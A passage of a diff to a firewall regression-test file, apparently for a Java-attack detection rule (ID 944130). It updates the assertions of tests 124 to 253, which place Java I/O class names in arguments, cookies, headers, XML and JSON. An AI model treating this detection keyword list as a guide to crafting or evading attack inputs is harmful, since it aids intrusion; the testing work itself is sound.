"Cookie test includes keyword java.io.FilterOutputStream" stages: @@ -2393,7 +2516,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 125 desc: "Cookie name includes keyword java.io.FilterOutputStream" stages: @@ -2413,7 +2537,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 126 desc: "Request header test includes keyword java.io.FilterOutputStream" stages: @@ -2433,7 +2558,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 127 desc: "XML attribute value includes keyword java.io.FilterOutputStream" stages: @@ -2452,7 +2578,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 128 desc: "XML element value includes keyword java.io.FilterOutputStream" stages: @@ -2471,7 +2598,8 @@ tests: version: "HTTP/1.0" data: "java.io.FilterOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 129 desc: "Nested XML element value includes keyword java.io.FilterOutputStream" stages: @@ -2490,7 +2618,8 @@ tests: version: "HTTP/1.0" data: "java.io.FilterOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 130 desc: "Content-Type text/plain includes keyword java.io.FilterOutputStream" stages: @@ -2509,7 +2638,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.FilterOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 131 desc: "Content-Type application/json arg value includes keyword java.io.FilterOutputStream" stages: @@ -2528,7 +2658,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.FilterOutputStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 132 desc: "Content-Type application/json arg name includes keyword java.io.FilterOutputStream" stages: @@ -2547,7 +2678,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.FilterOutputStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 133 desc: "Argument test includes keyword java.io.FilterReader" stages: @@ -2566,7 +2698,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.FilterReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 134 desc: "Argument name includes keyword java.io.FilterReader" stages: @@ -2585,7 +2718,8 @@ tests: version: "HTTP/1.0" data: "java.io.FilterReader=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 135 desc: "Cookie test includes keyword java.io.FilterReader" stages: @@ -2605,7 +2739,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 136 desc: "Cookie name includes keyword java.io.FilterReader" stages: @@ -2625,7 +2760,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 137 desc: "Request header test includes keyword java.io.FilterReader" stages: @@ -2645,7 +2781,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 138 desc: "XML attribute value includes keyword java.io.FilterReader" stages: @@ -2664,7 +2801,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 139 desc: "XML element value includes keyword java.io.FilterReader" stages: @@ -2683,7 +2821,8 @@ tests: version: "HTTP/1.0" data: "java.io.FilterReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 140 desc: "Nested XML element value includes keyword java.io.FilterReader" stages: @@ -2702,7 +2841,8 @@ tests: version: "HTTP/1.0" data: "java.io.FilterReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 141 desc: "Content-Type text/plain includes keyword java.io.FilterReader" stages: @@ -2721,7 +2861,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.FilterReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 142 desc: "Content-Type application/json arg value includes keyword java.io.FilterReader" stages: @@ -2740,7 +2881,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.FilterReader\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 143 desc: "Content-Type application/json arg name includes keyword java.io.FilterReader" stages: @@ -2759,7 +2901,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.FilterReader\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 144 desc: "Argument test includes keyword java.io.InputStream" stages: @@ -2778,7 +2921,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.InputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 145 desc: "Argument name includes keyword java.io.InputStream" stages: @@ -2797,7 +2941,8 @@ tests: version: "HTTP/1.0" data: "java.io.InputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 146 desc: "Cookie test includes keyword java.io.InputStream" stages: @@ -2817,7 +2962,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 147 desc: "Cookie name includes keyword java.io.InputStream" stages: @@ -2837,7 +2983,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 148 desc: "Request header test includes keyword java.io.InputStream" stages: @@ -2857,7 +3004,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 149 desc: "XML attribute value includes keyword java.io.InputStream" stages: @@ -2876,7 +3024,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 150 desc: "XML element value includes keyword java.io.InputStream" stages: @@ -2895,7 +3044,8 @@ tests: version: "HTTP/1.0" data: "java.io.InputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 151 desc: "Nested XML element value includes keyword java.io.InputStream" stages: @@ -2914,7 +3064,8 @@ tests: version: "HTTP/1.0" data: "java.io.InputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 152 desc: "Content-Type text/plain includes keyword java.io.InputStream" stages: @@ -2933,7 +3084,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.InputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 153 desc: "Content-Type application/json arg value includes keyword java.io.InputStream" stages: @@ -2952,7 +3104,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.InputStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 154 desc: "Content-Type application/json arg name includes keyword java.io.InputStream" stages: @@ -2971,7 +3124,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.InputStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 155 desc: "Argument test includes keyword java.io.InputStreamReader" stages: @@ -2990,7 +3144,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.InputStreamReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 156 desc: "Argument name includes keyword java.io.InputStreamReader" stages: @@ -3009,7 +3164,8 @@ tests: version: "HTTP/1.0" data: "java.io.InputStreamReader=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 157 desc: "Cookie test includes keyword java.io.InputStreamReader" stages: @@ -3029,7 +3185,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 158 desc: "Cookie name includes keyword java.io.InputStreamReader" stages: @@ -3049,7 +3206,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 159 desc: "Request header test includes keyword java.io.InputStreamReader" stages: @@ -3069,7 +3227,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 160 desc: "XML attribute value includes keyword java.io.InputStreamReader" stages: @@ -3088,7 +3247,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 161 desc: "XML element value includes keyword java.io.InputStreamReader" stages: @@ -3107,7 +3267,8 @@ tests: version: "HTTP/1.0" data: "java.io.InputStreamReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 162 desc: "Nested XML element value includes keyword java.io.InputStreamReader" stages: @@ -3126,7 +3287,8 @@ tests: version: "HTTP/1.0" data: "java.io.InputStreamReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 163 desc: "Content-Type text/plain includes keyword java.io.InputStreamReader" stages: @@ -3145,7 +3307,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.InputStreamReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 164 desc: "Content-Type application/json arg value includes keyword java.io.InputStreamReader" stages: @@ -3164,7 +3327,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.InputStreamReader\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 165 desc: "Content-Type application/json arg name includes keyword java.io.InputStreamReader" stages: @@ -3183,7 +3347,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.InputStreamReader\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 166 desc: "Argument test includes keyword java.io.LineNumberReader" stages: @@ -3202,7 +3367,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.LineNumberReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 167 desc: "Argument name includes keyword java.io.LineNumberReader" stages: @@ -3221,7 +3387,8 @@ tests: version: "HTTP/1.0" data: "java.io.LineNumberReader=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 168 desc: "Cookie test includes keyword java.io.LineNumberReader" stages: @@ -3241,7 +3408,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 169 desc: "Cookie name includes keyword java.io.LineNumberReader" stages: @@ -3261,7 +3429,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 170 desc: "Request header test includes keyword java.io.LineNumberReader" stages: @@ -3281,7 +3450,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 171 desc: "XML attribute value includes keyword java.io.LineNumberReader" stages: @@ -3300,7 +3470,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 172 desc: "XML element value includes keyword java.io.LineNumberReader" stages: @@ -3319,7 +3490,8 @@ tests: version: "HTTP/1.0" data: "java.io.LineNumberReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 173 desc: "Nested XML element value includes keyword java.io.LineNumberReader" stages: @@ -3338,7 +3510,8 @@ tests: version: "HTTP/1.0" data: "java.io.LineNumberReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 174 desc: "Content-Type text/plain includes keyword java.io.LineNumberReader" stages: @@ -3357,7 +3530,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.LineNumberReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 175 desc: "Content-Type application/json arg value includes keyword java.io.LineNumberReader" stages: @@ -3376,7 +3550,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.LineNumberReader\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 176 desc: "Content-Type application/json arg name includes keyword java.io.LineNumberReader" stages: @@ -3395,7 +3570,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.LineNumberReader\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 177 desc: "Argument test includes keyword java.io.ObjectOutputStream" stages: @@ -3414,7 +3590,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.ObjectOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 178 desc: "Argument name includes keyword java.io.ObjectOutputStream" stages: @@ -3433,7 +3610,8 @@ tests: version: "HTTP/1.0" data: "java.io.ObjectOutputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 179 desc: "Cookie test includes keyword java.io.ObjectOutputStream" stages: @@ -3453,7 +3631,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 180 desc: "Cookie name includes keyword java.io.ObjectOutputStream" stages: @@ -3473,7 +3652,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 181 desc: "Request header test includes keyword java.io.ObjectOutputStream" stages: @@ -3493,7 +3673,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 182 desc: "XML attribute value includes keyword java.io.ObjectOutputStream" stages: @@ -3512,7 +3693,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 183 desc: "XML element value includes keyword java.io.ObjectOutputStream" stages: @@ -3531,7 +3713,8 @@ tests: version: "HTTP/1.0" data: "java.io.ObjectOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 184 desc: "Nested XML element value includes keyword java.io.ObjectOutputStream" stages: @@ -3550,7 +3733,8 @@ tests: version: "HTTP/1.0" data: "java.io.ObjectOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 185 desc: "Content-Type text/plain includes keyword java.io.ObjectOutputStream" stages: @@ -3569,7 +3753,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.ObjectOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 186 desc: "Content-Type application/json arg value includes keyword java.io.ObjectOutputStream" stages: @@ -3588,7 +3773,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.ObjectOutputStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 187 desc: "Content-Type application/json arg name includes keyword java.io.ObjectOutputStream" stages: @@ -3607,7 +3793,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.ObjectOutputStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 188 desc: "Argument test includes keyword java.io.OutputStream" stages: @@ -3626,7 +3813,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.OutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 189 desc: "Argument name includes keyword java.io.OutputStream" stages: @@ -3645,7 +3833,8 @@ tests: version: "HTTP/1.0" data: "java.io.OutputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 190 desc: "Cookie test includes keyword java.io.OutputStream" stages: @@ -3665,7 +3854,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 191 desc: "Cookie name includes keyword java.io.OutputStream" stages: @@ -3685,7 +3875,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 192 desc: "Request header test includes keyword java.io.OutputStream" stages: @@ -3705,7 +3896,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 193 desc: "XML attribute value includes keyword java.io.OutputStream" stages: @@ -3724,7 +3916,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 194 desc: "XML element value includes keyword java.io.OutputStream" stages: @@ -3743,7 +3936,8 @@ tests: version: "HTTP/1.0" data: "java.io.OutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 195 desc: "Nested XML element value includes keyword java.io.OutputStream" stages: @@ -3762,7 +3956,8 @@ tests: version: "HTTP/1.0" data: "java.io.OutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 196 desc: "Content-Type text/plain includes keyword java.io.OutputStream" stages: @@ -3781,7 +3976,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.OutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 197 desc: "Content-Type application/json arg value includes keyword java.io.OutputStream" stages: @@ -3800,7 +3996,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.OutputStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 198 desc: "Content-Type application/json arg name includes keyword java.io.OutputStream" stages: @@ -3819,7 +4016,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.OutputStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 199 desc: "Argument test includes keyword java.io.PipedOutputStream" stages: @@ -3838,7 +4036,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.PipedOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 200 desc: "Argument name includes keyword java.io.PipedOutputStream" stages: @@ -3857,7 +4056,8 @@ tests: version: "HTTP/1.0" data: "java.io.PipedOutputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 201 desc: "Cookie test includes keyword java.io.PipedOutputStream" stages: @@ -3877,7 +4077,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 202 desc: "Cookie name includes keyword java.io.PipedOutputStream" stages: @@ -3897,7 +4098,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 203 desc: "Request header test includes keyword java.io.PipedOutputStream" stages: @@ -3917,7 +4119,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 204 desc: "XML attribute value includes keyword java.io.PipedOutputStream" stages: @@ -3936,7 +4139,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 205 desc: "XML element value includes keyword java.io.PipedOutputStream" stages: @@ -3955,7 +4159,8 @@ tests: version: "HTTP/1.0" data: "java.io.PipedOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 206 desc: "Nested XML element value includes keyword java.io.PipedOutputStream" stages: @@ -3974,7 +4179,8 @@ tests: version: "HTTP/1.0" data: "java.io.PipedOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 207 desc: "Content-Type text/plain includes keyword java.io.PipedOutputStream" stages: @@ -3993,7 +4199,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.PipedOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 208 desc: "Content-Type application/json arg value includes keyword java.io.PipedOutputStream" stages: @@ -4012,7 +4219,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.PipedOutputStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 209 desc: "Content-Type application/json arg name includes keyword java.io.PipedOutputStream" stages: @@ -4031,7 +4239,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.PipedOutputStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 210 desc: "Argument test includes keyword java.io.PipedReader" stages: @@ -4050,7 +4259,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.PipedReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 211 desc: "Argument name includes keyword java.io.PipedReader" stages: @@ -4069,7 +4279,8 @@ tests: version: "HTTP/1.0" data: "java.io.PipedReader=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 212 desc: "Cookie test includes keyword java.io.PipedReader" stages: @@ -4089,7 +4300,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 213 desc: "Cookie name includes keyword java.io.PipedReader" stages: @@ -4109,7 +4321,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 214 desc: "Request header test includes keyword java.io.PipedReader" stages: @@ -4129,7 +4342,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 215 desc: "XML attribute value includes keyword java.io.PipedReader" stages: @@ -4148,7 +4362,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 216 desc: "XML element value includes keyword java.io.PipedReader" stages: @@ -4167,7 +4382,8 @@ tests: version: "HTTP/1.0" data: "java.io.PipedReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 217 desc: "Nested XML element value includes keyword java.io.PipedReader" stages: @@ -4186,7 +4402,8 @@ tests: version: "HTTP/1.0" data: "java.io.PipedReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 218 desc: "Content-Type text/plain includes keyword java.io.PipedReader" stages: @@ -4205,7 +4422,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.PipedReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 219 desc: "Content-Type application/json arg value includes keyword java.io.PipedReader" stages: @@ -4224,7 +4442,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.PipedReader\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 220 desc: "Content-Type application/json arg name includes keyword java.io.PipedReader" stages: @@ -4243,7 +4462,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.PipedReader\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 221 desc: "Argument test includes keyword java.io.PrintStream" stages: @@ -4262,7 +4482,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.PrintStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 222 desc: "Argument name includes keyword java.io.PrintStream" stages: @@ -4281,7 +4502,8 @@ tests: version: "HTTP/1.0" data: "java.io.PrintStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 223 desc: "Cookie test includes keyword java.io.PrintStream" stages: @@ -4301,7 +4523,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 224 desc: "Cookie name includes keyword java.io.PrintStream" stages: @@ -4321,7 +4544,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 225 desc: "Request header test includes keyword java.io.PrintStream" stages: @@ -4341,7 +4565,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 226 desc: "XML attribute value includes keyword java.io.PrintStream" stages: @@ -4360,7 +4585,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 227 desc: "XML element value includes keyword java.io.PrintStream" stages: @@ -4379,7 +4605,8 @@ tests: version: "HTTP/1.0" data: "java.io.PrintStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 228 desc: "Nested XML element value includes keyword java.io.PrintStream" stages: @@ -4398,7 +4625,8 @@ tests: version: "HTTP/1.0" data: "java.io.PrintStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 229 desc: "Content-Type text/plain includes keyword java.io.PrintStream" stages: @@ -4417,7 +4645,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.PrintStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 230 desc: "Content-Type application/json arg value includes keyword java.io.PrintStream" stages: @@ -4436,7 +4665,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.PrintStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 231 desc: "Content-Type application/json arg name includes keyword java.io.PrintStream" stages: @@ -4455,7 +4685,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.PrintStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 232 desc: "Argument test includes keyword java.io.PushbackInputStream" stages: @@ -4474,7 +4705,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.PushbackInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 233 desc: "Argument name includes keyword java.io.PushbackInputStream" stages: @@ -4493,7 +4725,8 @@ tests: version: "HTTP/1.0" data: "java.io.PushbackInputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 234 desc: "Cookie test includes keyword java.io.PushbackInputStream" stages: @@ -4513,7 +4746,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 235 desc: "Cookie name includes keyword java.io.PushbackInputStream" stages: @@ -4533,7 +4767,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 236 desc: "Request header test includes keyword java.io.PushbackInputStream" stages: @@ -4553,7 +4788,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 237 desc: "XML attribute value includes keyword java.io.PushbackInputStream" stages: @@ -4572,7 +4808,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 238 desc: "XML element value includes keyword java.io.PushbackInputStream" stages: @@ -4591,7 +4828,8 @@ tests: version: "HTTP/1.0" data: "java.io.PushbackInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 239 desc: "Nested XML element value includes keyword java.io.PushbackInputStream" stages: @@ -4610,7 +4848,8 @@ tests: version: "HTTP/1.0" data: "java.io.PushbackInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 240 desc: "Content-Type text/plain includes keyword java.io.PushbackInputStream" stages: @@ -4629,7 +4868,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.PushbackInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 241 desc: "Content-Type application/json arg value includes keyword java.io.PushbackInputStream" stages: @@ -4648,7 +4888,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.PushbackInputStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 242 desc: "Content-Type application/json arg name includes keyword java.io.PushbackInputStream" stages: @@ -4667,7 +4908,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.PushbackInputStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 243 desc: "Argument test includes keyword java.io.Reader" stages: @@ -4686,7 +4928,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.Reader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 244 desc: "Argument name includes keyword java.io.Reader" stages: @@ -4705,7 +4948,8 @@ tests: version: "HTTP/1.0" data: "java.io.Reader=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 245 desc: "Cookie test includes keyword java.io.Reader" stages: @@ -4725,7 +4969,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 246 desc: "Cookie name includes keyword java.io.Reader" stages: @@ -4745,7 +4990,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 247 desc: "Request header test includes keyword java.io.Reader" stages: @@ -4765,7 +5011,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 248 desc: "XML attribute value includes keyword java.io.Reader" stages: @@ -4784,7 +5031,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 249 desc: "XML element value includes keyword java.io.Reader" stages: @@ -4803,7 +5051,8 @@ tests: version: "HTTP/1.0" data: "java.io.Reader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 250 desc: "Nested XML element value includes keyword java.io.Reader" stages: @@ -4822,7 +5071,8 @@ tests: version: "HTTP/1.0" data: "java.io.Reader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 251 desc: "Content-Type text/plain includes keyword java.io.Reader" stages: @@ -4841,7 +5091,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.Reader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 252 desc: "Content-Type application/json arg value includes keyword java.io.Reader" stages: @@ -4860,7 +5111,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.Reader\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 253 desc: "Content-Type application/json arg name includes keyword java.io.Reader" stages: @@ -4879,7 +5131,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.Reader\": \"test\"}" output: - log_contains: "id 